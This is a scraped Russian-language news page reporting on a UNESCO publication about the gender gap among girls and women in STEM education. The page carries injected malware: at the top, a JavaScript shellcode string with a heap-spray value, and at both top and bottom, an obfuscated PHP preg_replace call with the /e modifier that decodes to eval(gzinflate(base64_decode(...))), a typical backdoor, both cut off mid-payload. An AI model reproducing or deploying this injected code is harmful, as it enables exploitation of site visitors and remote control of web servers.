%3cscript> var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u0a0a%u0a0a"); Новый доклад ЮНЕСКО проливает свет на гендерное неравенство в образовании в области НТИМ
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
Европейская правда

Новый доклад ЮНЕСКО проливает свет на гендерное неравенство в образовании в области НТИМ

Новый доклад ЮНЕСКО проливает свет на гендерное неравенство в образовании в области НТИМ
Новый доклад ЮНЕСКО проливает свет на гендерное неравенство в образовании в области НТИМ

Несмотря на большие усилия, предпринятые в последние десятилетия по сокращению гендерного разрыва в образовании в сфере наук, технологий, инженерии и математики (НТИМ), основное неравенство по-прежнему сохраняется. Во многих случаях социально-экономические, культурные и другие препятствия по-прежнему не позволяют девочкам-учащимся завершить или в полной мере получать качественное образование по своему выбору.

Новая публикация ЮНЕСКО по этому вопросу «Найти решение: образование девочек и женщин в области НТИМ», представленая на Международном симпозиуме и политическом форуме ЮНЕСКО, раскрывает факторы, препятствующие или же способствующие образованию девочек и женщин в области НТИМ. Публикакция содержит углубленный анализ проблем, успеваемости и прогресса в обучении. Вот некоторые из вопросов, затрагиваемые в докладе:

Каково общее положение девочек в области образовании в сфере НТИМ?

Гендерное неравенство в образовании в НТИМ поразительно. В системе высшего образования женщины составляют только 35% от общего числа студентов, обучающихся в сфере НТИМ. Сегодня женщины составляют лишь 28% от общего количества исследователей в мире. Гендерные стереотипы и предвзятые отношения ставят под угрозу качество обучения для учащихся-женщин и ограничивают их выбор образования.

Каковы препятствия?


Основная проблема во многих странах не ограничивается лишь количеством девочек, посещающих школу, а также связана с  ограниченностью выбора направления образования, доступного для тех, кто посещает школу. В большинстве случаев представленность девочек значительно отстаёт в образовании по предметам НТИМ.
Девочки теряют интерес к предметам НТИМ по мере взросления, особенно между ранним и поздним подростковым возрастом. Гендерный разрыв в сфере НТИМ становится особенно очевидным в старших классах средней школы, что отражается в выборе девочками области передовых исследований в области математики и науки.
Несоразмерное число женщин продолжают отказываться от обучения в области НТИМ во время учебы в высших учебных заведениях, по мере перехода в сферу трудовой деятельности и уже в процессе развития своей карьеры.

Какова роль социальных факторов в этой тенденции и в какой мере девочки и женщины усваивают негативные стереотипы?


Невыгодное положение девочек в сфере НТИМ является результатом множественных и переплетающихся факторов, встроенных в процессы социализации и обучения. К ним относятся социальные, культурные и гендерные нормы, которые влияют на воспитание девочек и мальчиков, их обучение и взаимодействие с родителями, семьей, друзьями, учителями и более широким сообществом. Эти факторы являются мощной силой в формировании их идентичности, убеждений, поведения и выбора.
Девочки растут в убеждении, что предметы НТИМ являются «мужской» сферой, и что способности женщин в этой сфере по своей сути уступают способностям мужчин. Несмотря на то, что биологические исследования противоречат какой-либо фактической основе таких убеждений, подобные убеждения по-прежнему существуют и подрывают доверие девочек, их заинтересованность и готовность участвовать в освоении предметов НТИМ.

Как мы можем помочь девочкам и женщинам понять, что гендерные стереотипы являются искусственными  и что исследования и работа в сфере НТИМ открыты для них?


Образовательныая система и школа играют центральную роль в определении интереса девочек к предметам НТИМ и обеспечении равных возможностей доступа и получения качественного образования в сфере НТИМ. Преподаватели, содержание учебных программ, материалы и оборудование, методы и инструменты оценки, общая учебная среда и процесс социализации в школе имеют решающее значение для обеспечения интереса девочек и их участия в исследованиях в сфере НТИМ и, в конечном счете, последующей работе в этой сфере.
Работа в сфере НТИМ считается «работой будущего». Обеспечение равного доступа девочек и женщин к образованию в НТИМ, и, в конечном счете, последующей работе в этой сфере является неотъемлемой частью прав человека, перспектив  науки и развития. Гендерное равенство в  сфере НТИМ обеспечит приобретение мальчиками и девочками, мужчинами и женщинами, навыков и возможностей вносить свой вклад в НТИМ и иметь возможность в равной степени пользоваться преимуществами НТИМ.

Новый доклад представляет собой материал для заинтересованных сторон в области образования и других лиц, работающих над  проблемами обеспечения гендерного равенства.

Узнайте больше об образовании девочек и женщин в области НТИМ.



Передает ЮНЕСКО
Просмотров: 639
  •    

Мы в социальных сетях:    Twitter    FaceBook    Google+

Другие новости по теме:

Добавить комментарий








Информация

Комментировать статьи на нашем сайте возможно только в течении 40 дней со дня публикации.

При полном или частичном воспроизведении материалов прямая гиперссылка на сайт www.europravda.com.ua обязательна. Редакция не всегда разделяет мнения публикуемых материалов и не несет ответственности за достоверность и правдивость размещенной информации взятой с открытых источников. В случае необходимости использования текстовых, фото, графических, информационно-графических, видео, аудио и иных размещенных материалов, права на которые принадлежат третьим лицам, необходимо обращаться непосредственно к правообладателям. Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте europravda.com.ua, пожалуйста свяжитесь с нами. Сайт не рекомендуется для чтения лицам младше + 18 лет. Редакция сайта открыта для сотрудничества, новых идей и предложений. Для связи с нами, пожалуйста используйте форму обратной связи.
<рhp preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/